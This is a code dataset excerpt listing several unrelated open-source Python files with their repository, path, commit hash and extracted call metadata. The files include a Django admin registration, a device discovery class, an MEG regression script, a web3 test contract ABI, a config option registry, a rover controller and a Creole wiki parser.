| [((29, 0, 29, 64), 'django.contrib.admin.site.register', 'admin.site.register', ({(29, 20, 29, 38): 'ComponentInterface', (29, 40, 29, 63): 'ComponentInterfaceAdmin'}, {}), '(ComponentInterface, ComponentInterfaceAdmin)', False, 'from django.contrib import admin\n'), ((30, 0, 30, 74), 'django.contrib.admin.site.register', 'admin.site.register', ({(30, 20, 30, 43): 'ComponentInterfaceValue', (30, 45, 30, 73): 'ComponentInterfaceValueAdmin'}, {}), '(ComponentInterfaceValue, ComponentInterfaceValueAdmin)', False, 'from django.contrib import admin\n')] |
paragguruji/publishtimer | publishtimer/__init__.py | b0b68d6c4d450a2cc22d29725e43c2a1261f0f74 | # -*- coding: utf-8 -*-
"""
Created on Mon Mar 28 15:28:24 2016
@author: Parag Guruji, [email protected]
"""
from .helpers import setup_env
done = setup_env() | [] |
jjlawren/netdisco | netdisco/discoverables/nanoleaf_aurora.py | ffc3cd092bff359b1c1fc1ed51940624b3c8076b | """Discover Nanoleaf Aurora devices."""
from . import MDNSDiscoverable
class Discoverable(MDNSDiscoverable):
"""Add support for discovering Nanoleaf Aurora devices."""
def __init__(self, nd):
super(Discoverable, self).__init__(nd, '_nanoleafapi._tcp.local.')
| [] |
DavidSabbagh/meeg_power_regression | debug/compute_score_common_ts_RETREAT.py | d9cd5e30028ffc24f08a52966c7641f611e92ee6 | import os.path as op
import numpy as np
import pandas as pd
from sklearn.pipeline import make_pipeline
from sklearn.linear_model import RidgeCV
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import KFold, cross_val_score
import mne
from pyriemann.tangentspace import TangentSpace
import config_drago as cfg
meg = 'mag'
scale = 1e22
rank = 65
reg = 1e-6
seed = 42
n_jobs = 10
cv = KFold(n_splits=n_jobs, shuffle=True, random_state=seed)
def proj_covs_common(covs, picks, scale=scale, rank=rank, reg=reg):
covs = [d['covs'][:, picks][:, :, picks] for d in covs if 'subject' in d]
covs = scale * np.array(covs)
n_sub, n_fb, n_ch, n_ch = covs.shape
# covs2 = covs.reshape(n_sub*n_fb, n_ch, n_ch)
# covs_avg = np.mean(covs2, axis=0)
covs_avg = covs.mean(axis=1).mean(axis=0)
d, V = np.linalg.eigh(covs_avg)
d = d[::-1]
V = V[:, ::-1]
proj_mat = V[:, :rank].T
covs_proj = np.zeros((n_sub, n_fb, rank, rank))
for sub in range(n_sub):
for fb in range(n_fb):
covs_proj[sub, fb] = proj_mat @ covs[sub, fb] @ proj_mat.T
covs_proj[sub, fb] += reg * np.eye(rank)
return covs_proj
def proj_covs_ts(covs):
n_sub, n_fb, p, _ = covs.shape
covs_ts = np.zeros((n_sub, n_fb, (p*(p+1))//2))
for fb in range(n_fb):
covs_ts[:, fb, :] = TangentSpace(metric="wasserstein").fit(
covs[:, fb, :, :]).transform(covs[:, fb, :, :])
return covs_ts
file_covs = op.join(cfg.path_outputs, 'covs_allch_oas.float32.h5')
covs_allch = mne.externals.h5io.read_hdf5(file_covs) # (sub, fb, ch, ch)
info = np.load(op.join(cfg.path_data, 'info_allch.npy')).item()
picks = mne.pick_types(info, meg=meg)
covs = proj_covs_common(covs_allch, picks, scale=scale, rank=rank, reg=reg)
X = proj_covs_ts(covs)
X = X.reshape(len(X), -1)
info = pd.read_csv(op.join(cfg.path_data, 'participants.csv'))
subjects = [d['subject'] for d in covs_allch if 'subject' in d]
y = info.set_index('Observations').age.loc[subjects]
ridge = make_pipeline(StandardScaler(),
RidgeCV(alphas=np.logspace(-3, 5, 100)))
score = - cross_val_score(ridge, X, y, cv=cv,
scoring="neg_mean_absolute_error", n_jobs=n_jobs,
verbose=True)
| [((20, 5, 20, 60), 'sklearn.model_selection.KFold', 'KFold', (), '', False, 'from sklearn.model_selection import KFold, cross_val_score\n'), ((53, 12, 53, 66), 'os.path.join', 'op.join', ({(53, 20, 53, 36): 'cfg.path_outputs', (53, 38, 53, 65): '"""covs_allch_oas.float32.h5"""'}, {}), "(cfg.path_outputs, 'covs_allch_oas.float32.h5')", True, 'import os.path as op\n'), ((54, 13, 54, 52), 'mne.externals.h5io.read_hdf5', 'mne.externals.h5io.read_hdf5', ({(54, 42, 54, 51): 'file_covs'}, {}), '(file_covs)', False, 'import mne\n'), ((57, 8, 57, 37), 'mne.pick_types', 'mne.pick_types', (), '', False, 'import mne\n'), ((31, 11, 31, 35), 'numpy.linalg.eigh', 'np.linalg.eigh', ({(31, 26, 31, 34): 'covs_avg'}, {}), '(covs_avg)', True, 'import numpy as np\n'), ((36, 16, 36, 51), 'numpy.zeros', 'np.zeros', ({(36, 25, 36, 50): '(n_sub, n_fb, rank, rank)'}, {}), '((n_sub, n_fb, rank, rank))', True, 'import numpy as np\n'), ((46, 14, 46, 51), 'numpy.zeros', 'np.zeros', ({(46, 23, 46, 50): '(n_sub, n_fb, p * (p + 1) // 2)'}, {}), '((n_sub, n_fb, p * (p + 1) // 2))', True, 'import numpy as np\n'), ((63, 19, 63, 61), 'os.path.join', 'op.join', ({(63, 27, 63, 40): 'cfg.path_data', (63, 42, 63, 60): '"""participants.csv"""'}, {}), "(cfg.path_data, 'participants.csv')", True, 'import os.path as op\n'), ((67, 22, 67, 38), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ({}, {}), '()', False, 'from sklearn.preprocessing import StandardScaler\n'), ((69, 10, 71, 39), 'sklearn.model_selection.cross_val_score', 'cross_val_score', (), '', False, 'from sklearn.model_selection import KFold, cross_val_score\n'), ((25, 19, 25, 33), 'numpy.array', 'np.array', ({(25, 28, 25, 32): 'covs'}, {}), '(covs)', True, 'import numpy as np\n'), ((56, 15, 56, 55), 'os.path.join', 'op.join', ({(56, 23, 56, 36): 'cfg.path_data', (56, 38, 56, 54): '"""info_allch.npy"""'}, {}), "(cfg.path_data, 'info_allch.npy')", True, 'import os.path as op\n'), ((68, 37, 68, 60), 'numpy.logspace', 'np.logspace', ({(68, 49, 68, 51): '-3', (68, 53, 68, 54): '5', (68, 56, 68, 59): '100'}, {}), '(-3, 5, 100)', True, 'import numpy as np\n'), ((40, 40, 40, 52), 'numpy.eye', 'np.eye', ({(40, 47, 40, 51): 'rank'}, {}), '(rank)', True, 'import numpy as np\n'), ((48, 28, 48, 62), 'pyriemann.tangentspace.TangentSpace', 'TangentSpace', (), '', False, 'from pyriemann.tangentspace import TangentSpace\n')] |
mengalong/bter | bter/publish.py | 7fa56f9c83429bc564e6d123498b14aae5c390b1 | # Copyright 2017~ mengalong <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import daiquiri
from six.moves.urllib import parse as urlparse
from stevedore import driver
logger = daiquiri.getLogger(__name__)
class PublisherManager(object):
def __init__(self, conf, url):
self.conf = conf
self.url = url
parsed_url = urlparse.urlparse(url)
logger.debug("The parsed url for publisher is :%s" % str(parsed_url))
self.publish_driver = driver.DriverManager(
'bter.publisher',
parsed_url.scheme,
invoke_args=(self.conf,),
invoke_on_load=True).driver
| [((20, 9, 20, 37), 'daiquiri.getLogger', 'daiquiri.getLogger', ({(20, 28, 20, 36): '__name__'}, {}), '(__name__)', False, 'import daiquiri\n'), ((28, 21, 28, 43), 'six.moves.urllib.parse.urlparse', 'urlparse.urlparse', ({(28, 39, 28, 42): 'url'}, {}), '(url)', True, 'from six.moves.urllib import parse as urlparse\n'), ((30, 30, 34, 32), 'stevedore.driver.DriverManager', 'driver.DriverManager', (), '', False, 'from stevedore import driver\n')] |
y19818/web3.py | web3/_utils/module_testing/math_contract.py | 32a85a287ab63220d1e0c06d77be74de595ff02f |
MATH_BYTECODE = (
"606060405261022e806100126000396000f360606040523615610074576000357c01000000000000"
"000000000000000000000000000000000000000000009004806316216f391461007657806361bc22"
"1a146100995780637cf5dab0146100bc578063a5f3c23b146100e8578063d09de08a1461011d5780"
"63dcf537b11461014057610074565b005b610083600480505061016c565b60405180828152602001"
"91505060405180910390f35b6100a6600480505061017f565b604051808281526020019150506040"
"5180910390f35b6100d26004808035906020019091905050610188565b6040518082815260200191"
"505060405180910390f35b61010760048080359060200190919080359060200190919050506101ea"
"565b6040518082815260200191505060405180910390f35b61012a6004805050610201565b604051"
"8082815260200191505060405180910390f35b610156600480803590602001909190505061021756"
"5b6040518082815260200191505060405180910390f35b6000600d9050805080905061017c565b90"
"565b60006000505481565b6000816000600082828250540192505081905550600060005054905080"
"507f3496c3ede4ec3ab3686712aa1c238593ea6a42df83f98a5ec7df9834cfa577c5816040518082"
"815260200191505060405180910390a18090506101e5565b919050565b6000818301905080508090"
"506101fb565b92915050565b600061020d6001610188565b9050610214565b90565b600060078202"
"90508050809050610229565b91905056"
)
MATH_ABI = [
{
"constant": False,
"inputs": [],
"name": "return13",
"outputs": [
{"name": "result", "type": "int256"},
],
"type": "function",
},
{
"constant": True,
"inputs": [],
"name": "counter",
"outputs": [
{"name": "", "type": "uint256"},
],
"type": "function",
},
{
"constant": False,
"inputs": [
{"name": "amt", "type": "uint256"},
],
"name": "increment",
"outputs": [
{"name": "result", "type": "uint256"},
],
"type": "function",
},
{
"constant": False,
"inputs": [
{"name": "a", "type": "int256"},
{"name": "b", "type": "int256"},
],
"name": "add",
"outputs": [
{"name": "result", "type": "int256"},
],
"type": "function",
},
{
"constant": False,
"inputs": [],
"name": "increment",
"outputs": [
{"name": "", "type": "uint256"},
],
"type": "function"
},
{
"constant": False,
"inputs": [
{"name": "a", "type": "int256"},
],
"name": "multiply7",
"outputs": [
{"name": "result", "type": "int256"},
],
"type": "function",
},
{
"anonymous": False,
"inputs": [
{"indexed": False, "name": "value", "type": "uint256"},
],
"name": "Increased",
"type": "event",
},
]
| [] |
nuby/open_dnsdb | dnsdb/config.py | 7fec703d8458083f0e6826393656055556e9f0b2 | # -*- coding: utf-8 -*-
import os
import sys
from datetime import timedelta
from oslo.config import cfg
CONF = cfg.CONF
CONF.register_opts([
cfg.StrOpt('log-dir'),
cfg.StrOpt('log-file'),
cfg.StrOpt('debug'),
cfg.StrOpt('verbose'),
], 'log')
CONF.register_opts([
cfg.StrOpt('connection'),
cfg.StrOpt('data'),
], 'DB')
CONF.register_opts([
cfg.StrOpt('server'),
cfg.StrOpt('port'),
cfg.StrOpt('from_addr'),
cfg.StrOpt('info_list'),
cfg.StrOpt('alert_list'),
], 'MAIL')
CONF.register_opts([
cfg.StrOpt('allow_ip'),
cfg.StrOpt('secret_key'),
cfg.StrOpt('env'),
cfg.StrOpt('local_group'),
cfg.StrOpt('acl_dir'),
cfg.StrOpt('view_acl_group')
], 'etc')
CONF.register_opts([
cfg.IntOpt('dnsupdater_port'),
], 'api')
CONF.register_opts([
cfg.StrOpt('acl_groups'),
cfg.IntOpt('cname_ttl'),
cfg.StrOpt('view_zone')
], 'view')
CONF.register_opts([
cfg.StrOpt('base-url',
default='/',
help='The url prefix of this site.'),
cfg.StrOpt('run-mode',
default="werkzeug",
choices=('gunicorn', 'werkzeug'),
help="Run server use the specify mode."),
cfg.StrOpt('bind',
default='0.0.0.0',
help='The IP address to bind'),
cfg.IntOpt('port',
default=8080,
help='The port to listen'),
cfg.BoolOpt('debug',
default=False),
], 'web')
CONF.register_opts([
cfg.StrOpt('config',
default=None,
help='The path to a Gunicorn config file.'),
cfg.StrOpt('bind',
default='127.0.0.1:8888'),
cfg.IntOpt('workers',
default=0,
help='The number of worker processes for handling requests'),
cfg.BoolOpt('daemon',
default=False,
help='Daemonize the Gunicorn process'),
cfg.StrOpt('accesslog',
default=None,
help='The Access log file to write to.'
'"-" means log to stderr.'),
cfg.StrOpt('loglevel',
default='info',
help='The granularity of Error log outputs.',
choices=('debug', 'info', 'warning', 'error', 'critical')),
cfg.BoolOpt('ignore-healthcheck-accesslog',
default=False),
cfg.IntOpt('timeout',
default=30,
help='Workers silent for more than this many seconds are '
'killed and restarted.'),
cfg.StrOpt('worker-class',
default='sync',
help='The type of workers to use.',
choices=('sync', 'eventlet', 'gevent', 'tornado'))
], 'gunicorn')
def setup_config(app_env, app_kind, conf_dir):
if "--" in sys.argv:
args = sys.argv[sys.argv.index("--") + 1:]
else:
args = []
common_config_file = os.path.join(conf_dir, "etc/{}/common.conf".format(app_env))
default_config_files = [common_config_file]
app_config_file = os.path.join(conf_dir, "etc/{}/{}.conf".format(app_env, app_kind))
default_config_files.append(app_config_file)
CONF(default_config_files=default_config_files, args=args)
class Config(object):
def __init__(self, app_env, app_kind, conf_dir):
# print 'conf_dir: ', conf_dir
if "--" in sys.argv:
args = sys.argv[sys.argv.index("--") + 1:]
else:
args = []
common_config_file = os.path.join(conf_dir, "etc/{}/common.conf".format(app_env))
default_config_files = [common_config_file]
app_config_file = os.path.join(conf_dir, "etc/{}/{}.conf".format(app_env, app_kind))
default_config_files.append(app_config_file)
CONF(default_config_files=default_config_files, args=args)
self.SECRET_KEY = os.environ.get('SECRET_KEY') or CONF.etc.secret_key
self.SQLALCHEMY_DATABASE_URI = CONF.DB.connection
self.SQLALCHEMY_TRACK_MODIFICATIONS = False
self.PERMANENT_SESSION_LIFETIME = timedelta(days=1)
# SECRET_KEY = os.environ.get('SECRET_KEY') or CONF.etc.secret_key
# SQLALCHEMY_DATABASE_URI = CONF.DB.connection
# SQLALCHEMY_TRACK_MODIFICATIONS = False
# PERMANENT_SESSION_LIFETIME = timedelta(days=1)
| [((12, 4, 12, 25), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', ({(12, 15, 12, 24): '"""log-dir"""'}, {}), "('log-dir')", False, 'from oslo.config import cfg\n'), ((13, 4, 13, 26), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', ({(13, 15, 13, 25): '"""log-file"""'}, {}), "('log-file')", False, 'from oslo.config import cfg\n'), ((14, 4, 14, 23), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', ({(14, 15, 14, 22): '"""debug"""'}, {}), "('debug')", False, 'from oslo.config import cfg\n'), ((15, 4, 15, 25), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', ({(15, 15, 15, 24): '"""verbose"""'}, {}), "('verbose')", False, 'from oslo.config import cfg\n'), ((19, 4, 19, 28), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', ({(19, 15, 19, 27): '"""connection"""'}, {}), "('connection')", False, 'from oslo.config import cfg\n'), ((20, 4, 20, 22), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', ({(20, 15, 20, 21): '"""data"""'}, {}), "('data')", False, 'from oslo.config import cfg\n'), ((24, 4, 24, 24), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', ({(24, 15, 24, 23): '"""server"""'}, {}), "('server')", False, 'from oslo.config import cfg\n'), ((25, 4, 25, 22), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', ({(25, 15, 25, 21): '"""port"""'}, {}), "('port')", False, 'from oslo.config import cfg\n'), ((26, 4, 26, 27), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', ({(26, 15, 26, 26): '"""from_addr"""'}, {}), "('from_addr')", False, 'from oslo.config import cfg\n'), ((27, 4, 27, 27), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', ({(27, 15, 27, 26): '"""info_list"""'}, {}), "('info_list')", False, 'from oslo.config import cfg\n'), ((28, 4, 28, 28), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', ({(28, 15, 28, 27): '"""alert_list"""'}, {}), "('alert_list')", False, 'from oslo.config import cfg\n'), ((32, 4, 32, 26), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', ({(32, 15, 32, 25): '"""allow_ip"""'}, {}), "('allow_ip')", False, 'from oslo.config import cfg\n'), ((33, 4, 33, 28), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', ({(33, 15, 33, 27): '"""secret_key"""'}, {}), "('secret_key')", False, 'from oslo.config import cfg\n'), ((34, 4, 34, 21), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', ({(34, 15, 34, 20): '"""env"""'}, {}), "('env')", False, 'from oslo.config import cfg\n'), ((35, 4, 35, 29), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', ({(35, 15, 35, 28): '"""local_group"""'}, {}), "('local_group')", False, 'from oslo.config import cfg\n'), ((36, 4, 36, 25), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', ({(36, 15, 36, 24): '"""acl_dir"""'}, {}), "('acl_dir')", False, 'from oslo.config import cfg\n'), ((37, 4, 37, 32), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', ({(37, 15, 37, 31): '"""view_acl_group"""'}, {}), "('view_acl_group')", False, 'from oslo.config import cfg\n'), ((41, 4, 41, 33), 'oslo.config.cfg.IntOpt', 'cfg.IntOpt', ({(41, 15, 41, 32): '"""dnsupdater_port"""'}, {}), "('dnsupdater_port')", False, 'from oslo.config import cfg\n'), ((45, 4, 45, 28), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', ({(45, 15, 45, 27): '"""acl_groups"""'}, {}), "('acl_groups')", False, 'from oslo.config import cfg\n'), ((46, 4, 46, 27), 'oslo.config.cfg.IntOpt', 'cfg.IntOpt', ({(46, 15, 46, 26): '"""cname_ttl"""'}, {}), "('cname_ttl')", False, 'from oslo.config import cfg\n'), ((47, 4, 47, 27), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', ({(47, 15, 47, 26): '"""view_zone"""'}, {}), "('view_zone')", False, 'from oslo.config import cfg\n'), ((51, 4, 53, 51), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', (), '', False, 'from oslo.config import cfg\n'), ((54, 4, 57, 55), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', (), '', False, 'from oslo.config import cfg\n'), ((58, 4, 60, 45), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', (), '', False, 'from oslo.config import cfg\n'), ((61, 4, 63, 41), 'oslo.config.cfg.IntOpt', 'cfg.IntOpt', (), '', False, 'from oslo.config import cfg\n'), ((64, 4, 65, 30), 'oslo.config.cfg.BoolOpt', 'cfg.BoolOpt', (), '', False, 'from oslo.config import cfg\n'), ((69, 4, 71, 58), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', (), '', False, 'from oslo.config import cfg\n'), ((72, 4, 73, 40), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', (), '', False, 'from oslo.config import cfg\n'), ((74, 4, 76, 75), 'oslo.config.cfg.IntOpt', 'cfg.IntOpt', (), '', False, 'from oslo.config import cfg\n'), ((77, 4, 79, 54), 'oslo.config.cfg.BoolOpt', 'cfg.BoolOpt', (), '', False, 'from oslo.config import cfg\n'), ((80, 4, 83, 47), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', (), '', False, 'from oslo.config import cfg\n'), ((84, 4, 87, 73), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', (), '', False, 'from oslo.config import cfg\n'), ((88, 4, 89, 30), 'oslo.config.cfg.BoolOpt', 'cfg.BoolOpt', (), '', False, 'from oslo.config import cfg\n'), ((90, 4, 93, 44), 'oslo.config.cfg.IntOpt', 'cfg.IntOpt', (), '', False, 'from oslo.config import cfg\n'), ((94, 4, 97, 65), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', (), '', False, 'from oslo.config import cfg\n'), ((131, 42, 131, 59), 'datetime.timedelta', 'timedelta', (), '', False, 'from datetime import timedelta\n'), ((128, 26, 128, 54), 'os.environ.get', 'os.environ.get', ({(128, 41, 128, 53): '"""SECRET_KEY"""'}, {}), "('SECRET_KEY')", False, 'import os\n'), ((103, 24, 103, 44), 'sys.argv.index', 'sys.argv.index', ({(103, 39, 103, 43): '"""--"""'}, {}), "('--')", False, 'import sys\n'), ((118, 28, 118, 48), 'sys.argv.index', 'sys.argv.index', ({(118, 43, 118, 47): '"""--"""'}, {}), "('--')", False, 'import sys\n')] |
cloudy/osr-rover-code | rover/rover.py | 07d370ae1cde75eaf2d279fcc7f220c95cf6d736 | from __future__ import print_function
import time
from rover import Robot
from connections import Connections
class Rover(Robot, Connections):
def __init__( self,
config,
bt_flag = 0,
xbox_flag = 0,
unix_flag = 0
):
self.bt_flag = bt_flag
self.xbox_flag = xbox_flag
self.unix_flag = unix_flag
super(Rover,self).__init__(config)
self.prev_cmd = [None,None]
if bt_flag and xbox_flag:
raise Exception( "[Rover init] Cannot initialize with both bluetooth and Xbox, run with only one argument")
elif bt_flag: self.connection_type = "b"
elif xbox_flag: self.connection_type = "x"
self.connectController()
def drive(self):
try:
v,r = self.getDriveVals()
if v,r != self.prev_cmd:
self.sendCommands(v,r)
self.prev_cmd = v,r
except KeyboardInterrupt:
self.cleanup()
except Exception as e:
print(e)
self.cleanup()
time.sleep(0.5)
self.connectController()
if self.unix_flag:
try:
self.sendUnixData()
except Exception as e:
print(e)
self.unix_flag = 0
def cleanup(self):
self.killMotors()
self.closeConnections()
| [] |
scanner/django-aswiki | aswiki/parser.py | 318908eeccc8da324846ac5ffc4d4a206f560521 | #
# File: $Id: parser.py 1865 2008-10-28 00:47:27Z scanner $
#
"""
This is where the logic and definition of our wiki markup parser lives.
We use the Python Creoleparser (which requires Genshi)
We make a custom dialect so that the parser can know the URL base for
all of the topics (pages) in the wiki and some additional goop so that
we can tell what other topics a given topic refers to.
"""
# system imports
#
from urllib import quote
from urlparse import urlparse
try:
import threading
except ImportError:
import dummy_threading as threading
# Django imports
#
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext as _
# 3rd party imports
#
from creoleparser.dialects import create_dialect, creole10_base, creole11_base
from creoleparser.core import Parser
from genshi import builder
# We see if we have the 'typogrify' app installed. If we do we will
# use it for rendering our templates to prettify them a bit.
#
try:
from typogrify.templatetags.typogrify import typogrify
except ImportError:
def typogrify(text):
return text
# Model imports
#
from aswiki.models import Topic
############################################################################
############################################################################
#
class TopicList(object):
"""
A helper class we use to keep track of all of the topics that are
referenced by the raw content for a specific topic. We pass the
objet and method instead 'path_fn' in to the 'path_func' parameter
of our creole dialect we are goign to generate.
The point of this class is that we need to know what topics are
referenced by a specific topic when its content is created or
modified. This lets us know that list of topics by their topic
names.
"""
########################################################################
#
def __init__(self):
"""
Very plain init. We set up the attribute for tracking topics.
"""
# The current topic that is being rendered, if we know it. This
# lets us root image url's relative to this topic.
#
self.current_topic = None
# The list of topics that we have encountered while rendering
# some content. This should be reset between renders.
#
self.topics = []
# A dict mapping the lower case topic name to the original case used
# in the text being parsed. This is so we can preserve the case
# when doing things like creating nascent topics.
#
self.topics_case = { }
# This is another list. It contains Topic's that we have
# found this topic referring to not via [[wiki links]] but via
# other methods like the <<subtopics >> macro. We need this so
# that when we are done rendering we can find out what other topics
# we should list in this topic's references.
#
self.extra_references = []
# This is a bit of ugliness. Since we instantiate a TopicList and pass
# a method when we create an instance of a Creole _dialect_ this one
# instance will be shared across this process instance which may well
# exist across multiple calls to render text via the parser generated
# from the dialect, which means our list of topics will grow every
# time we render a document.
#
# However, this is a problem since for our current use we only want
# the topic names from rendering a single topic. So we have to make
# sure no other thread of execution (if there are other threads
# running.. if not this is a cheap operation.. XXX I think) modifies
# the topic list we have to provide a mutex so only one thread at a
# time can add topics to a topic list.
#
self.lock = threading.Lock()
return
########################################################################
#
def clear_and_lock(self):
"""
Locks the mutex to prevent conflicts on updating the topic list if
more then one thread tries to render using the same dialect instance
at the same time.
"""
self.lock.acquire()
self.topics = []
self.topics_case = { }
self.extra_references = []
return
########################################################################
#
def unlock(self):
"""
Unlocks the mutex. Do NOT access the topics parameter after this is
called. You can not be guaranteed whose list of topics you are seeing.
"""
self.lock.release()
return
##################################################################
#
def image_fn(self, image_name):
"""
This is called by our creole parser every time it hits an
image link. This lets us translate image names to be relative
to the topic they are found in as appropriate.
We only apply this magic transformation for images url's that
are relative.
Arguments:
- `image_name`: The name of the image being referenced.
"""
# If the image url is NOT absolute, root it relative to this
# topic.
#
u = urlparse(image_name)
if self.current_topic and len(u.path) > 0 and u.path[0] != "/":
return self.current_topic + "/" + image_name
return image_name
########################################################################
#
def path_fn(self, topic_name):
"""
This is called by our creole parser every time it encounters a
wiki link in the text it is parsing. This lets us track which
topics this text refers to.
We are passed in a topic name, and we return that topic
name.. if we were doing some sort of transformation on topic
names this is where it would happen.
Arguments:
- `topic_name`: The topic name being referenced as a wiki link.
"""
lower_topic_name = topic_name.lower()
# if this is a topic name we have not seen yet, add it to our list
# of topics.
#
if lower_topic_name not in self.topics:
self.topics.append(lower_topic_name)
self.topics_case[lower_topic_name] = topic_name
return topic_name
############################################################################
#
def class_fn(topic_name):
"""
This function is invoked by the markup dialect every time it encounters a
wiki topic. It returns a string that is the css class name to add to wiki
links as they are turned in to proper <a href></a> links.
We use this as a way to annotate topics that do not exist yet with some
graphical attribute so that users can easily tell which topics are not yet
created.
We use the wiki.models.TopicManager's css_class_name method to do this
lookup.
NOTE: Since this module is imported by the wiki.models module we need to
import that module inside here so that we can access the Topic
model. This is cheap since it will already be imported.
Arguments:
- `topic_name`: the topic name being checked for existence.
"""
# XXX This is where we should do a cache lookup of the topic name
# and only if that fails fall back to
# Topic.objects.css_class_name(topic_name)
#
return Topic.objects.css_class_name(topic_name)
####################################################################
#
def output_mailto(arg_string):
"""
Given the arguments of an anchor macro output the proper genshi
stream that will render a mailto link. We also need to support the magic
argument string format of '<you> AT <word> AT <foo> DOT <foo>'
Arguments:
- `arg_string`: The argument string of the anchor macro.
- `macro_body`: The macro body if provided
- `block_type`: True if this is a block macro.
"""
# XXX Need to support the fancy format.. but for now just get the basic
# working.
return builder.tag.a(arg_string, href="mailto:%s" % arg_string)
####################################################################
#
def output_subtopics(arg_string):
"""
This will take a single string as its input. It will find all
topics for which the string as a topic name is the parent topic.
There is some semantic magic in a topic if it contains periods, ie: the
'.' character. This forms a kind of hierarchy. Loosely speaking all topics
that start with the same prefix, separated by '.' are sub-topics.
So: 2007.Agenda is a sub-topic of 2007. 2007.Agenda.foo is a subtopic of
2007 and 2007.Agenda.
This macro will insert in to the output <ul> of the topics that are proper
subtopics of the given string, ordered by name. So in the above example if
I were to say <<subtopics 2007>> it would give me "2007.Agenda" and
"2007.Agenda.foo" in a <ul>
If the arg string ends with a dot, then it is treated as the
separator. ie: <<subtopics 2007.>> and <<subtopics 2007>> are identical.
Arguments:
- `arg_string`: The topic we want to find all subtopics of.
"""
arg_string = arg_string
if arg_string[-1] != '.':
arg_string = arg_string + "."
topics = Topic.objects.filter(lc_name__istartswith = arg_string.lower()).order_by('lc_name')
if topics.count() == 0:
return None
ul = builder.tag.ul()
# For every topic that matches our pattern we insert a 'li' link
# to that topic in our output. We also add this topic to the
# 'extra_references' list in our global TOPIC_LIST object. This is
# so that the prerender../save() methods of the Topic object we are
# rendering this output for can know to add those topics to the list
# of topics referenced by the topic being rendered.
for topic in topics:
TOPIC_LIST.extra_references.append(topic)
ul.append(builder.tag.li(builder.tag.a(topic.name,
href = topic.get_absolute_url())))
return ul
####################################################################
#
def output_attachments(arg_string):
"""
Returns a <ul> of all of the attachments attached to the topic name
given as the arg_string.
Arguments:
- `arg_string`: Expected to be the name of a topic. If no such topic
exist, then no attachment list is generated.
"""
try:
topic = Topic.objects.get(lc_name = arg_string.lower())
except Topic.DoesNotExist:
return None
ul = builder.tag.ul()
# For every file attachment on this topic, add a 'li' link
# to that attachment.
#
for attachment in topic.file_attachments.all():
ul.append(builder.tag.li(builder.tag.a(attachment.basename(),
href = attachment.get_absolute_url())))
return ul
####################################################################
#
def macro_fn(name, arg_string, macro_body, block_type, environ):
"""
Handles the macros we define for our version of markup.
Arguments:
- `name`: The name of the macro
- `arg_string`: The argument string, including any delimiters
- `macro_body`: The macro body, None for macro with no body.
- `block_type`: True for block type macros.
- `environ` : The environment object, passed through from
creoleparser.core.Parser class's 'parse()' method.
"""
name = name.strip().lower()
arg_string = arg_string.strip()
if name == 'anchor':
if block_type:
return builder.tag.a(macro_body, name = arg_string)
else:
return builder.tag.a(name = arg_string)
elif name == 'mailto':
return output_mailto(arg_string)
elif name == 'gettext':
if block_type:
return _(macro_body)
else:
return _(arg_string)
elif name == 'subtopics':
return output_subtopics(arg_string)
elif name == 'attachlist':
return output_attachments(arg_string)
elif name == 'attachment':
# For including downloadable attachments in a wiki document.
if block_type:
return builder.tag.a(macro_body, href=arg_string)
else:
return builder.tag.a(arg_string, href=arg_string)
return None
##
## Create our custom dialect. It will use our class function and a TopicList
## instance. The root URL for all wiki topics will be the same as the
## 'aswiki_topic_index' url.
##
## NOTE: This assumes that the url for a specific Topic is the same as the url
## for the aswiki_topic_index with the Topic name appended to it
##
TOPIC_LIST = TopicList()
# dialect = creoleparser.dialects.Creole10(
# wiki_links_base_url = reverse('aswiki_topic_index'),
# wiki_links_space_char = '%20',
# use_additions = True,
# no_wiki_monospace = False,
# wiki_links_class_func = class_fn,
# wiki_links_path_func = TOPIC_LIST.path_fn,
# macro_func = macro_fn,
# interwiki_links_base_urls=dict(wikicreole='http://wikicreole.org/wiki/',
# wikipedia='http://wikipedia.org/wiki/',)
# )
parser = Parser(dialect = create_dialect(\
creole11_base,
wiki_links_base_url = reverse('aswiki_topic_index'), # NOTE: Make this
# a two element
# list for images
# to be loaded
# from a separate
# URL
wiki_links_space_char = '%20', # NOTE: make this a two element list to
# give images a different space
# character.
no_wiki_monospace = False,
wiki_links_class_func = class_fn,
wiki_links_path_func = (TOPIC_LIST.path_fn,
TOPIC_LIST.image_fn),
bodied_macros = { },
non_bodied_macros = { },
macro_func = macro_fn,
# custom_markup = (),
interwiki_links_base_urls = {
'wikicreole' : 'http://wikicreole.org/wiki/',
'wikipedia' :'http://wikipedia.org/wiki/' }
))
